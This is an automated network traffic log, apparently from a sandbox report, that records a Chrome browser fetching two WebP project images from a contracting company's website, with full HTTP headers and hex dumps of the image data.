                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 12:44:49 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 83836
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7931INData Raw: 52 49 46 46 74 47 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 47 01 00 50 5a 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 51 a9 25 bf b6 a7 76 9a 73 f0 1d 09 62 6e 96 bc 3b 69 f7 fa 16 20 9e 83 db 97 35 c1 be 06 0c 17 37 79 71 fa 85 45 45 96 8a fd ff 89 d7 ac ff b0 e9 fd ff 73 c1 d5 03 3c c5 73 c5 fe c5 de cf 17 af fe a2 7b b5 f6 7f d5 7a 81 f1 ff 8c 7f 66 fc 67 af ef f9 7c a2 f9 af 29 4f 7b ef 79 ff 23 f6 ef de 7f ea df 61 bf ea 1f e8 7d 4e ff e9 fd d5 f7 f3 fd eb ff 17 e5 1f c2 7f ea bf f3 7f 79 bd ed fd 3a ff a1 f5 28 fe d3 e9 e7 eb 21 e8 eb e7 39 ff e3 f7 a7 e2 63 fb af ff 3e a0 0f ff fe dd fd 0d fe 3d ff bb cf 87 d0 3f c3 ff e5 fe f7 c9 1f d1 bb 0a b1 0f f5 de 0c 7f 65 f9 e7 eb 57 fc ff 06 ff 56 fe 8b d0 83 cd de 98
                                              Data Ascii: RIFFtGWEBPVP8XVP8 GPZ*>lQ%vsbn;i 57yqEEs<s{zfg|)O{y#a}Ny:(!9c>=?eWV
                                              2024-09-27 06:20:14 UTC8000INData Raw: 7d a8 57 b3 92 c2 5e a2 78 47 43 db bb 91 11 02 1a 6f 32 59 15 94 1c 38 c0 85 6d 0a 2a 07 ab 6b b4 cf 71 72 04 72 12 ba a2 fb 98 5c 51 3e cf fc 91 ff 05 99 7d 3d ad 41 89 f1 42 51 8f 19 ee 22 4b df 6a ae 84 37 04 20 43 69 94 92 83 fe ad e5 8d 41 31 af 22 8c 50 18 81 f8 3f 5e e3 e4 ad 1c 4e 60 b3 b0 7b 26 98 f7 26 2c ba 2b 29 e3 ae db 82 fe c9 5d 83 8a 0c 32 9e 85 ab 43 15 b2 1a 6b 46 06 c0 81 e0 42 2e 5c 6b ed 83 74 43 de 93 48 8e 11 48 c9 c0 2c d6 5d 36 24 e1 dc 0a 16 9d a7 9b 28 5e 94 42 29 12 df 32 29 9a 95 d7 c4 c0 6a dc af ca 00 e7 1b 1e 7e 78 50 2f da c8 c1 cd 93 86 a7 04 8c 17 aa 7d 77 84 ca 0a 73 95 79 e4 84 da 13 22 a4 46 4e d1 7b 7a 8c 37 54 b6 98 5c 5b 14 91 1f 6d ee 9a 48 0e 1d 9f 5f 71 70 78 98 1d f5 db 2c 00 f9 a5 d3 df 6b 6e c4 3c ee 39 d2
                                              Data Ascii: }W^xGCo2Y8m*kqrr\Q>}=ABQ"Kj7 CiA1"P?^N`{&&,+)]2CkFB.\ktCHH,]6$(^B)2)j~xP/}wsy"FN{z7T\[mH_qpx,kn<9
                                              2024-09-27 06:20:14 UTC8000INData Raw: 87 36 14 ee e0 3e 0b 51 d0 f9 77 b9 46 fb ba 29 21 25 2d 11 71 3a a5 86 00 9e 0e fe a7 d0 ed 62 20 fe 44 79 c4 e7 15 1b e2 44 97 cf 24 5f 20 f2 0c 95 a7 62 f1 55 ec 31 b1 40 34 3f b2 a6 4c 37 82 53 98 dc 61 22 1b e8 7e 59 8b e4 a9 60 db d1 74 ea 17 d6 39 39 9c 25 de ef 34 5d e3 44 74 ee 86 3e 26 53 b2 da ae 8f 87 35 e3 29 ac 19 2a f8 20 e3 38 52 85 fe 9b cb f5 e9 83 fb f4 70 62 4a 0a 7b 56 43 43 f3 47 38 42 4c a7 1b 25 fb d6 07 ad a0 fe 93 cb b0 c1 b8 ad 45 e4 d7 94 5f b4 e4 5e c3 e8 b7 1c e9 71 5e a6 d4 19 45 54 9a 00 2e f9 aa f2 ad bb 3f 8b 6f 40 23 94 8f 27 45 98 e9 3e 34 ae 19 c1 09 9a e5 ab 90 d9 e0 6c aa 57 92 d7 fa 33 92 af 0d f9 ef f7 3f cc b2 50 c1 a0 42 56 ba fa 82 66 79 79 be 84 33 50 b2 ca 45 0c e3 c3 b5 b9 1e 9f f7 ef 7f da 3f 0e f1 de 60 d6
                                              Data Ascii: 6>QwF)!%-q:b DyD$_ bU1@4?L7Sa"~Y`t99%4]Dt>&S5)* 8RpbJ{VCCG8BL%E_^q^ET.?o@#'E>4lW3?PBVfyy3PE?`
                                              2024-09-27 06:20:14 UTC8000INData Raw: 72 dd 08 74 92 b7 a2 84 93 e0 43 43 ef 20 fe 82 33 02 94 21 db cf d8 24 5e cc 0c 17 87 5f c6 f1 6e 20 af 7e 55 ae f9 fe c5 15 9c 3f d4 1f 16 90 2c 8e cc 7f 25 38 eb 0f 55 ac 40 0c 1d 67 37 46 12 aa fc d5 a4 9e d1 17 ad 2f c9 00 2b d1 c3 19 25 b6 68 82 73 a7 f6 5c 95 19 b3 78 e9 23 b5 75 14 80 5c a8 6e f1 d0 37 a7 45 b7 24 d1 c6 00 61 49 80 27 e3 bc 2b 5b bf ce b1 d2 9f bb 5a e6 b9 32 cd c9 15 d6 8b 17 5a 39 b5 e7 ed 95 38 73 91 84 51 fc d8 3d d1 c8 21 f8 8d 7e a3 8c f8 c9 1e d2 42 80 1d d8 3f 40 9f ac 26 4c a0 fd 5a 05 00 e2 84 81 d6 08 2e b0 e9 fa d6 15 3c eb e6 2d 74 14 b0 39 52 42 c0 75 48 25 49 ab 3a 92 6b 2d 95 64 a2 c5 58 90 16 f3 0d f5 21 f5 e3 4f 2b 19 70 11 73 e3 fc cc f8 2d f1 75 77 d0 c8 ea 8a bc e3 0e 2f 5f 12 c8 82 05 f3 d8 c0 68 9a 86 16 bc
                                              Data Ascii: rtCC 3!$^_n ~U?,%8U@g7F/+%hs\x#u\n7E$aI'+[Z2Z98sQ=!~B?@&LZ.<-t9RBuH%I:k-dX!O+ps-uw/_h
                                              2024-09-27 06:20:14 UTC8000INData Raw: 5e bf 88 c6 7b 9a ec f1 9a 1d af 92 d3 fb 84 30 9e 6b 65 76 ba 4b 04 03 7b 78 51 3c 2e 93 92 b8 38 71 15 e8 2c ad f3 d7 57 c3 01 89 5e 4b 40 60 b4 de 86 f6 7f e4 b7 67 ab b4 63 94 95 fe d7 85 47 f4 81 15 c3 5e c8 57 5b f5 06 28 dc 3c 0d 6b 07 93 d0 01 a5 87 a9 6d c4 09 84 d1 90 81 19 f1 16 e0 79 8c 69 36 8e 94 f3 19 cc 6b 16 d5 b8 97 71 e4 15 26 d1 67 0b 74 fe b2 68 2f dc 8f 84 14 09 cc da e7 f9 1b ab 09 67 b3 0c 8f 0a fd e6 d0 a0 73 8e aa 03 84 00 2f 1b ee 59 a6 8a 75 9a 0f a8 42 8e ce 14 4a a2 e6 a1 d8 10 17 d6 27 ff 85 88 a9 b2 c8 17 57 22 3b 1a df 1c 74 20 d2 ba 97 7d 49 37 ab d0 a1 98 18 29 ea 09 ca 1e 73 58 4a 16 4d a2 b1 be 34 e0 24 cd 3c fb d9 41 77 db 86 77 f1 45 05 07 f5 57 47 ae d9 0e 7c 98 b5 a2 d1 a6 ec aa 7b 59 3f 91 e1 e6 4a 53 8d d9 ef 4c
                                              Data Ascii: ^{0kevK{xQ<.8q,W^K@`gcG^W[(<kmyi6kq&gth/gs/YuBJ'W";t }I7)sXJM4$<AwwEWG|{Y?JSL
                                              2024-09-27 06:20:14 UTC8000INData Raw: e6 3f ef 5a 8d 1f 73 8b 60 45 ff e7 21 58 9a 34 63 46 5d 2f 7e 1d 83 5e e0 d3 cc d1 1c 3a f5 3e 7c 57 c5 94 0c a7 19 3f fa 8d 40 5f dd 99 b3 c6 6a 09 8b ef e8 24 7e a1 39 34 83 22 82 c0 0c 56 21 f2 29 a3 fa 6e c9 7c 53 4b d0 48 57 fc 94 da 3d 73 3c 08 ac 94 a7 37 33 8a 11 76 7d 8e 3e e2 5b 5d 73 3a 28 01 82 b1 aa b0 8a 7f fe b8 3a 90 8b 63 41 3f 42 79 1a 6f 55 2f b4 1e b3 bf 0d 64 4f e3 93 23 68 50 53 30 c5 d8 0e 82 77 77 69 63 c7 48 83 71 20 af c8 97 c6 e4 e4 e4 c1 c5 92 87 26 91 ed 53 70 95 32 2b 79 f6 a2 32 0f 95 bf 78 f9 e8 07 94 94 e8 dc 96 a1 3f 41 7e 3c 95 74 58 4f b0 7c 4d 72 a7 c9 5b d2 fe bd 11 a2 fe a0 ce fd aa 3f 16 35 7f 66 62 d9 01 09 6b fb 5d 7a d9 f7 03 93 b3 08 68 11 00 53 9a 01 e1 c7 93 ca d1 6c 2c ac cd 1c bf dc d2 2c a2 8b 4f cb 9b 8c
                                              Data Ascii: ?Zs`E!X4cF]/~^:>|W?@_j$~94"V!)n|SKHW=s<73v}>[]s:(:cA?ByoU/dO#hPS0wwicHq &Sp2+y2x?A~<tXO|Mr[?5fbk]zhSl,,O
                                              2024-09-27 06:20:14 UTC8000INData Raw: 04 48 d1 6c 83 01 17 c0 9d fc 66 3c bc b4 f9 ec 1c 05 e0 41 54 d5 d0 ca 9d 8b 5c 92 64 1f e4 5f 16 74 01 a9 d1 b9 aa a3 c9 d2 67 c5 5a e2 f1 c4 53 fb 09 11 b7 6c 4b 36 2a da 9f f7 6d e4 7b c9 91 c6 b8 16 83 7f f4 b3 b9 49 f0 6b 36 14 b6 bc db 91 a7 a4 61 19 61 e1 a0 c2 b8 40 ac 02 4e df fa 96 fe 3b af 6b d9 af ea 46 fd 02 bf 0e aa ac 04 a4 79 fb 02 eb e5 b3 b5 1e 78 b4 64 a6 f2 1e 26 b5 ee 88 6b e2 9f 72 ca 3f c3 9d f1 f9 30 f6 e5 98 33 6b 89 17 25 39 13 00 38 14 fc a6 cc d7 53 aa b5 aa a3 ea 7f 5b 08 00 5c 75 46 93 cb e8 32 84 71 f5 cf 56 e3 9d b2 4c bd d5 c8 35 39 be 99 db d3 07 f3 02 84 ff 04 30 01 a2 4c 4c b4 65 d2 15 a0 01 1d 91 b1 bd 19 c1 00 1e 33 2a e8 4b 2d ad 35 bd 42 5b fe b3 28 ae 51 1f 93 f6 02 ad 59 7a 17 de df 06 d3 f6 38 9e 06 2e b0 27 ed
                                              Data Ascii: Hlf<AT\d_tgZSlK6*m{Ik6aa@N;kFyxd&kr?03k%98S[\uF2qVL590LLe3*K-5B[(QYz8.'
                                              2024-09-27 06:20:14 UTC8000INData Raw: ee 39 46 8c 05 71 4a a2 08 04 88 f9 43 ab 54 f0 6a 1d 95 7e 75 33 6e 78 b4 e4 54 46 6c 8c c1 cc c5 ec c4 9c 42 b8 73 d1 1c 4d 22 95 cb 9f 7c 16 c5 2f 95 ec ff b2 e2 09 e2 18 ce 10 ec 71 71 a4 dd 0b 96 2f d0 fa 0e a6 c5 b1 cd 75 94 4f 4a 14 14 8d 1d df f7 9f eb 3d 64 2b 32 38 9e 28 aa 52 ce 31 fb fd bf f4 42 7d a0 09 33 f3 a8 21 9b 18 5b f6 e1 54 f0 e4 67 df a3 58 32 6f 17 96 32 b6 4f 28 da 0c fa 7c 6b 11 45 bc 83 f6 70 8d aa 19 47 20 4a c5 60 73 0b 07 5b ef 39 0a 2b 09 ed a5 70 42 9e 1f 56 51 04 67 dd 41 bc 12 9b 50 99 07 43 0a db cc 07 b7 ae a2 cf 0f c5 f5 5a c0 77 52 44 7a 99 8a 05 3b 9a 63 78 e8 02 cb 00 65 01 21 5f 5f b0 90 58 7e e1 71 83 c1 1d ed a7 a2 31 f9 74 0d f1 e7 29 be 4f e4 fa 41 34 7e fc ec 22 3a f4 0d ba 71 4e 31 b2 8c fb d1 da 88 b9 8e 35
                                              Data Ascii: 9FqJCTj~u3nxTFlBsM"|/qq/uOJ=d+28(R1B}3![TgX2o2O(|kEpG J`s[9+pBVQgAPCZwRDz;cxe!__X~q1t)OA4~":qN15
                                              2024-09-27 06:20:14 UTC8000INData Raw: 7c 29 fc f3 54 a8 76 f1 06 e7 88 f8 03 b6 7e 9b 4a e4 03 d8 d4 4b ec ac b5 4b 6d 38 b5 6f 43 44 9a 25 6c 1f d1 9b ee e1 e7 0b 12 52 2e 5b 79 44 b5 d2 b2 bd 14 58 d5 82 ff d9 10 42 5b ea ba 4f cb 8b 35 44 8d e5 e7 cb 81 0c 33 4d 4d b1 0f 4b 11 3e 51 db ab 73 f8 a2 cd f1 c6 d8 f2 b6 95 2d 4e 71 29 15 8c 92 bc e1 25 5e bc 51 a5 2c 7e cd 5d 45 21 11 a7 58 0c 8d cb b9 1f ee a9 29 c9 e0 86 78 c2 74 bb 9c 9c 4a ff e8 9e 95 e5 85 9e a3 ac a3 04 d5 48 3c 96 a2 4d 2f a3 e7 31 ae aa 0e 83 aa 23 1e 8b 6e dd 9c 9c 6b 43 91 15 49 56 9c b1 2f ff 50 81 25 75 ce db 44 d9 43 0f 5c c1 fa bc 06 c1 2f 74 81 e2 51 e3 cf ef 7a b5 a8 9d 21 95 9c 0d e9 74 29 0a 05 b7 c5 7f 31 5f 3a f8 3b de 76 2d 28 c8 a3 7e cd be 16 6e 32 fa a3 23 04 62 09 67 9d 9c b7 67 25 78 8c f8 82 11 40 83
                                              Data Ascii: |)Tv~JKKm8oCD%lR.[yDXB[O5D3MMK>Qs-Nq)%^Q,~]E!X)xtJH<M/1#nkCIV/P%uDC\/tQz!t)1_:;v-(~n2#bgg%x@
                                              2024-09-27 06:20:14 UTC8000INData Raw: 93 8c a1 4a 76 c0 35 c3 6e ec a7 62 52 1e 39 b2 02 d8 6d df 65 20 b4 1b ce 7b 7d 3d 07 ad 20 1a 6a 27 7b 5c 25 e1 e0 61 70 e8 79 d0 68 37 af 98 04 5a 0d 79 70 a0 f8 b2 85 ad 2d 28 6e 33 f3 71 8e ae 8d 46 fc b4 72 25 c6 88 4d 1c 54 26 3e 41 b5 bb 3b 82 6c 56 31 1b f1 30 61 fc 37 ad 6d 7e 76 25 28 e0 11 13 01 c6 66 c6 42 f8 af c0 28 2e 46 c3 d6 a0 1f f0 49 87 10 1d fe ea 17 8f 3f 42 fa d4 fc 51 49 0a 53 94 19 f1 3a 51 30 2f d3 e5 6f 21 93 1e de 95 5e 92 a3 75 73 7d 91 ae 40 f4 3c 57 47 a1 25 09 89 92 2e 82 08 8d d3 c3 30 30 40 ad b2 4d 69 82 46 52 f4 46 21 b5 6c d8 1f a4 18 07 bf fa e6 71 85 3f 4f 5a e3 3c ec 22 5e bf 69 99 01 61 55 b4 ae c9 f4 ce e4 cd 83 78 0f 53 db 06 f1 05 ae 36 10 c4 8c 5b e3 dd 4c 93 b6 a1 bb 10 0f 79 e0 54 08 8b d4 79 bc f4 86 1f 31
                                              Data Ascii: Jv5nbR9me {}= j'{\%apyh7Zyp-(n3qFr%MT&>A;lV10a7m~v%(fB(.FI?BQIS:Q0/o!^us}@<WG%.00@MiFRF!lq?OZ<"^iaUxS6[LyTy1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.2.465410173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC723OUTGET /uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 13:22:18 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 119988
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7930INData Raw: 52 49 46 46 ac d4 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 38 d4 01 00 10 2f 08 9d 01 2a cf 04 a3 03 3e e9 64 ab 50 29 25 32 34 aa 53 2c f2 90 1d 09 64 6e 2d a1 5e 0f 60 fe 13 0f fe 71 62 db d4 39 5b e5 c7 cb d7 99 f3 b4 f1 a7 bd d4 2e f7 14 54 86 25 fc 6e 76 02 41 a8 33 ff 4f 58 9f 38 99 ed 7a 3c d0 50 e1 bf 47 ed 37 67 bc 93 f1 8f f2 7f a6 f4 fe e4 5f 17 3e eb f9 3f 55 5f f2 78 4b ed 5f f6 bc ef 3a cb e7 63 e7 27 fe 1f 5d 3f dd 7f e8 fb 16 ff 94 f4 bb ea 03 cd 8f f6 7f fb bf ba de e9 df f9 7f 77 3d fc 7f 55 ff 81 fb 85 fe fb e4 63 fc 07 fc 1f 5b 4f 5b 2f ec df fa ff ff ff dd f8 5f fe 7f ff 8b ff ff b5 3f ad 0f f7 df fd 7e cc 5f bb 3e a0 1f fe 3d b9 3a 03 fc bb ff 47 9c cf a0 ff 7b e0 df e6 fe 93 1e d6 5f cc e7
                                              Data Ascii: RIFFWEBPVP8XVP8 8/*>dP)%24S,dn-^`qb9[.T%nvA3OX8z<PG7g_>?U_xK_:c']?w=Uc[O[/_?~_>=:G{_
                                              2024-09-27 06:20:14 UTC8000INData Raw: 06 40 4e 34 65 1d 28 10 97 8c 73 bd 1f 4e 2f 9e 95 9d 38 dc 5c e6 83 50 b3 28 73 17 03 1a f2 ba 5e 55 a4 ae a4 08 27 29 93 59 51 f1 b7 b8 e3 fa a4 82 4d ad db f4 5f 47 08 ad 1c 50 9c bb b1 30 65 43 eb ce 11 ee a6 4f 7d 09 56 e4 dc 43 17 28 88 25 27 f2 42 e5 19 df e9 25 23 0d 08 18 42 5d 08 f6 cd 3f 96 eb 13 22 46 36 67 03 25 5b e7 12 55 cb 68 66 9c 3b 54 e5 82 f7 dc 17 13 43 22 fd aa c5 52 7b 21 e3 ce 45 2e 65 20 20 cf 75 8c fb ce 29 f2 ee e8 63 11 47 60 34 a0 d4 f7 35 f0 85 34 80 81 d2 26 8f 85 09 84 bb 13 75 ea 3a ee 37 8f d2 3d 83 d6 c2 9f a3 4f 9b 2d 5e 14 69 94 38 7d 05 97 bb a5 f2 52 37 64 b2 9e 87 0c 9f bd 7b b5 5a 52 b6 40 3f 61 5f 36 72 0a f2 b3 5c 2f b5 88 6c 04 c5 1a 89 f3 ca 49 76 18 db 8e 5e 60 b1 cb 58 d6 63 bb ed ec da 5e a8 23 bd 50 2e 3c
                                              Data Ascii: @N4e(sN/8\P(s^U')YQM_GP0eCO}VC(%'B%#B]?"F6g%[Uhf;TC"R{!E.e u)cG`454&u:7=O-^i8}R7d{ZR@?a_6r\/lIv^`Xc^#P.<
                                              2024-09-27 06:20:14 UTC8000INData Raw: 82 86 f6 37 22 1b d7 39 79 03 40 d7 f4 ac 9e 81 da 04 b0 7a 8b c5 e6 e1 6a a0 ef 6c d0 27 d1 2c 77 96 51 64 46 4b 48 13 4b ad 05 81 ab ee 31 42 08 6c ca 01 03 ce 0b 9a 98 bf 67 e5 ab 3e 15 3b 62 b2 ac 68 17 17 e8 3c 2d 38 c0 6d ad 89 6d 1e e9 68 35 68 5d 7b 3c 30 e7 3c e5 25 51 38 13 a6 cb 20 38 79 31 d6 1b 77 23 f3 8d 4d 8b 3c be 92 48 5e 67 2c 84 fd 64 ad b3 d5 14 25 ec 0d 86 79 e7 93 71 7e 2b 66 fc db 67 aa 6b ca a1 af 6c 99 a0 12 46 96 d2 96 94 11 86 01 eb f0 3b 9d 27 c1 c3 1c 52 a5 59 7a 6e e9 c1 4f 57 83 b1 62 ce 07 9c d7 d9 35 7b 71 58 b4 ce 81 39 04 71 ef a0 8f 79 6c 74 22 38 aa a1 94 05 e2 19 13 e1 46 57 22 06 f7 a4 e1 cd 8a 95 53 98 fd 69 d5 45 a2 e7 6e ac 6e 1d 28 88 2c b5 de b0 b9 28 2c 38 d2 9c c9 92 00 d2 da 03 69 b2 76 47 52 45 26 94 10 68
                                              Data Ascii: 7"9y@zjl',wQdFKHK1Blg>;bh<-8mmh5h]{<0<%Q8 8y1w#M<H^g,d%yq~+fgklF;'RYznOWb5{qX9qylt"8FW"SiEnn(,(,8ivGRE&h
                                              2024-09-27 06:20:14 UTC8000INData Raw: 72 11 95 c8 b8 17 ed be e9 ee 0d 7c f1 c6 63 ae 6a 3e dd e6 ed c3 41 42 46 58 d1 3d 84 73 6f 48 29 f7 91 9b 71 ec 9a 2e 3e bc ef 6d 6c e2 64 83 a6 ce e0 aa 7b d8 51 93 10 dc da ee e7 ae d4 b0 7c 4c d7 64 a0 2d 98 20 b3 d2 8d e8 62 f2 e1 79 57 94 ed ce f3 ed 5a ed d2 93 f9 52 79 ae 51 e9 f3 3d 31 bf e4 f9 72 61 dd a7 d7 d7 67 ec 9d e2 79 6c 8c 61 d3 e6 f1 17 93 38 c4 21 f7 a6 5f fd 2d fc 4b fb cf 77 b2 c1 6e dd da e1 bc b3 c2 0a 2d 99 9c f1 09 3e 94 fc df 12 10 29 47 0a 6d c9 68 d8 09 24 0e bc b1 cf f4 8b e5 e3 09 fe d0 30 1f 67 e1 4d b3 02 19 73 91 e9 f7 e6 04 67 51 2d 7e 16 54 09 9f 63 42 bd f3 8e 5b 2c 0c 16 52 af 32 6f 5f 2a bc 55 bd 8a 3e c2 92 e5 37 44 d0 9d 3e 5f 8d 61 e2 f0 1f b1 6c fa 46 ab 6e 78 22 39 cd bf 2c 4d ac 7d 8e 3b fe 10 d5 db a9 be 30
                                              Data Ascii: r|cj>ABFX=soH)q.>mld{Q|Ld- byWZRyQ=1ragyla8!_-Kwn->)Gmh$0gMsgQ-~TcB[,R2o_*U>7D>_alFnx"9,M};0
                                              2024-09-27 06:20:14 UTC8000INData Raw: 97 ff 38 20 c9 a9 1e 9f bb ce be 6b c2 c0 9c 75 f8 8a f5 49 e5 1e ea c7 e0 16 f7 4d db 7c d7 aa ed 3e 22 2a f8 51 58 66 70 75 ff df 72 0c 19 25 92 25 3c 4b ec e7 24 9b 80 ad 21 38 7d 91 85 b9 8a ef 5e b8 cf b9 37 bf d1 a4 6b a1 2c c4 0d 30 11 3a 39 15 16 78 df 1b 08 fe bf a3 01 56 a0 25 e2 df 74 6e a3 12 2b d8 cb 68 15 1c 2d 56 a8 07 af 98 0a f8 d9 35 86 43 ac 8a a4 bd bf 80 74 d7 a7 56 8c 68 55 0d a7 8d 98 6e 8a 67 85 46 1b 15 d5 79 a2 32 47 84 74 bf 8a 69 dd cb b5 4d 3a 93 5d 46 e7 1a 2f b1 98 ac db bb 26 ce 4e 78 20 4c 89 e3 a2 e7 12 ea 71 5e 90 d3 52 2b 68 b4 ad 2a e2 70 26 04 c3 c0 6d d1 09 9a 05 90 24 ae 45 58 63 2d 19 1b 2c d5 56 5e af 7b 4f e2 b5 31 45 46 03 54 f5 9b 1c a8 b8 37 5f 53 ea 99 bb 03 7f a4 55 24 13 29 a0 f7 7f 5d db 24 94 9e d5 b8 1d
                                              Data Ascii: 8 kuIM|>"*QXfpur%%<K$!8}^7k,0:9xV%tn+h-V5CtVhUngFy2GtiM:]F/&Nx Lq^R+h*p&m$EXc-,V^{O1EFT7_SU$)]$
                                              2024-09-27 06:20:14 UTC8000INData Raw: df a7 28 70 5e 71 06 04 e9 3c ad 63 1e f3 02 62 c2 23 23 21 bb 34 c8 33 dd 0f 8f a6 d7 4b 86 65 55 29 26 bc 9c a0 ff 29 bc 0c 5f c0 c1 a8 f8 36 54 09 a7 4b bc b9 33 a9 f8 69 bb f5 df a6 93 22 1e 2b 78 58 5e dc 7d e9 a9 2e cf 1b ce 5f 64 9f 44 55 f5 05 4b 40 02 b9 dc d5 c6 47 c9 ef 6d 08 d2 bf 4a 26 e4 cb 79 c4 4d fc 34 57 80 eb 63 f9 45 a0 46 8d a2 52 27 f6 80 6e f6 0c 98 79 3a 2b 05 e5 e8 42 f9 c6 98 a7 45 b4 07 a7 48 82 15 40 a2 61 f1 3d 8f d6 bf 2e 10 c8 3f a5 7e 52 f4 26 0f 2f dd b5 02 c8 4b cb e6 1a 8f 79 2f d3 4d 66 25 10 dc 3b bd 43 a8 00 1c 3e 66 dc 2a 7c 6c 73 45 2b 83 d0 2b b1 b6 f9 ba d6 7e c4 55 0e cc bf 58 50 8f 44 c4 d8 58 2c 06 07 bf 05 42 59 65 3b ac 9a e3 77 4b f4 a3 9d 0d 5d 5b 33 f4 ab a1 85 41 26 78 a4 17 30 cf 6a e6 f5 26 79 43 17 dd
                                              Data Ascii: (p^q<cb##!43KeU)&)_6TK3i"+xX^}._dDUK@GmJ&yM4WcEFR'ny:+BEH@a=.?~R&/Ky/Mf%;C>f*|lsE++~UXPDX,BYe;wK][3A&x0j&yC
                                              2024-09-27 06:20:14 UTC8000INData Raw: bb cb cf 8e 94 1f a5 e9 12 f1 84 75 94 2c f4 0f d9 17 84 9e d4 5a 0c cf 1c 88 ec 0e d8 23 ef f0 d2 bd 94 37 ee f0 21 46 23 c3 99 64 66 c6 65 82 05 ff ba 26 85 6c fd 27 97 48 cc d4 1d 25 7f 19 3d 66 ae 79 a1 04 28 08 9c e3 1b b4 73 3a 35 7b 7f 7e 46 77 90 3f f9 1a 7a 05 a9 87 2e ac 01 34 f8 44 fc 0b be 96 88 19 ca 85 0a 09 8b fb 45 ee 84 af ed cd 8e fe 6f ee 9c 3f ea 51 82 26 09 2f 1a bf db 6c fc 0a aa 8d 3e ad 6b 86 d4 0a b1 7c d6 45 57 f6 86 73 d6 44 52 49 43 30 29 04 cb 2c 7a 03 1d 8c 68 41 b6 4e 20 48 7b 89 eb a9 d3 b2 82 2c 51 ec ca fd c2 31 a8 11 97 31 a8 68 8c 72 b1 bf 47 6a ae a5 ca 4b 8c 83 11 0c 7c 1b 74 0c 44 b1 a5 36 9f 0c a9 9c 4e f4 1c 0f ad f5 d7 22 62 af fb 07 1d 4e 23 03 2c f4 a3 73 51 72 ee 3f e2 c5 bf b5 4d 61 86 68 8e 0c db b5 fb ad fb
                                              Data Ascii: u,Z#7!F#dfe&l'H%=fy(s:5{~Fw?z.4DEo?Q&/l>k|EWsDRIC0),zhAN H{,Q11hrGjK|tD6N"bN#,sQr?Mah
                                              2024-09-27 06:20:14 UTC8000INData Raw: 20 d0 e6 d5 49 4f 6b 96 82 41 e6 49 80 c6 e4 ce 54 5b 60 40 2e ad b9 af d3 de 4c 74 f5 ea c9 0e 8b a7 f2 6d f6 7a d9 1f ac d1 9b 09 2d 60 ab c7 6c 42 58 23 5a 75 b6 d0 af c9 24 23 31 11 e7 6e 74 24 cd a9 de c8 a0 12 7a b3 0d e1 e3 c8 64 73 1a 8f 69 04 3a 3c 8f 86 5c 69 05 3b 7b 85 53 ea 17 d2 b2 c5 1a 1b ab de 74 2e 36 03 45 a6 0c 70 5b 6e c4 23 01 f6 fa e4 4b bf 45 27 f3 f0 d9 9b 52 2f 3a 0d eb e8 89 42 73 66 2e 69 a9 5a 0f fd 53 f9 46 a7 62 24 15 49 54 e2 8a 8f 6a e5 e3 ad ee a2 d5 97 9a 4a e7 cf 73 eb 33 fe 9c e4 a2 c7 99 2b 19 9f d4 18 06 f9 54 39 4c 87 07 64 c5 2a 2b e8 3b d8 04 18 fe ed 20 a2 01 c3 84 75 c6 94 1d 94 2d 77 a9 82 03 40 65 f2 60 36 2c 6b 63 f8 ec 7a cf a1 c5 39 67 7b 02 ac 27 89 5f ea 4d d6 f9 d7 44 29 45 c5 1c 7f fb 21 6d ed c7 3b 99
                                              Data Ascii: IOkAIT[`@.Ltmz-`lBX#Zu$#1nt$zdsi:<\i;{St.6Ep[n#KE'R/:Bsf.iZSFb$ITjJs3+T9Ld*+; u-w@e`6,kcz9g{'_MD)E!m;
